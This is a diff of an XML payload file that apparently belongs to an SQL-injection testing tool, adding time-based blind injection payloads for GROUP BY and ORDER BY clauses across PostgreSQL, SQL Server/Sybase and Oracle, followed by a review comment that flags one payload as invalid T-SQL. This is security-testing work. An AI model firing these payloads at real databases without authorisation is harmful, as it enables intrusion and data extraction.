Copy file name to clipboardExpand all lines: xml/payloads.xml
+123-4Lines changed: 123 additions & 4 deletions
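--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -2841,15 +2841,15 @@ Formats:
 <title>MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
 <stype>5</stype>
 <level>3</level>
-<risk>2</risk>
+<risk>1</risk>
 <clause>2,3</clause>
 <where>1</where>
 <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
 <request>
 <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
 </request>
 <response>
-<time>[DELAYED]</time>
+<time>[SLEEPTIME]</time>
 </response>
 <details>
 <dbms>MySQL</dbms>
@@ -2858,7 +2858,7 @@ Formats:
 </test>
 
 <test>
-<title>MySQL < 5.0.12 boolean-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<title>MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
 <stype>5</stype>
 <level>4</level>
 <risk>2</risk>
@@ -2875,7 +2875,126 @@ Formats:
 <dbms>MySQL</dbms>
 </details>
 </test>
-<!-- TODO: add tests for other DBMSes -->
+
+<test>
+<title>PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>PostgreSQL</dbms>
+<dbms_version>> 8.1</dbms_version>
+</details>
+</test>
+
+<test>
+<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>PostgreSQL</dbms>
+</details>
+</test>
+
+<test>
+<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Microsoft SQL Server</dbms>
+<dbms>Sybase</dbms>
+<os>Windows</os>
+</details>
+</test>
+
+<test>
+<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>Microsoft SQL Server</dbms>
+<dbms>Sybase</dbms>
+<os>Windows</os>
+</details>
+</test>
+
+<test>
+<title>Oracle time-based blind - GROUP BY and ORDER BY clauses</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Oracle</dbms>
+</details>
+</test>
+
+<test>
+<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>Oracle</dbms>
+</details>
+</test>
+<!-- TODO: if possible, add payload for Microsoft Access -->
 <!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->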
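Review bot: The `WAITFOR DELAY '0:0:[SLEEPTIME]'` in the `<vector>` and `<payload>` of the new "Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses" test sits inside a `CASE ... END` expression, but in T-SQL WAITFOR is a statement, not an expression, so that payload should be rejected by the parser wherever the CASE is evaluated and can never produce the delay the `<response>` expects; the heavy-query variant directly below it (the cross-joined `sysusers` COUNT) is the form that actually works in a GROUP BY/ORDER BY position. Unless a Sybase dialect is known to accept it, drop this test or make its THEN branch the same `(SELECT COUNT(*) FROM sysusers AS sys1, ... sysusers AS sys7)` subquery and keep only one of the two entries. Two smaller inconsistencies on the same pair: both declare `<clause>2,3</clause>` (GROUP BY and ORDER BY) while their titles say only "ORDER BY", unlike every other DBMS entry in the hunk, and `<os>Windows</os>` is asserted for tests that also target Sybase, which does not imply Windows. The last two context lines of this hunk are not shown on the page, so the end of the surrounding section could not be checked here.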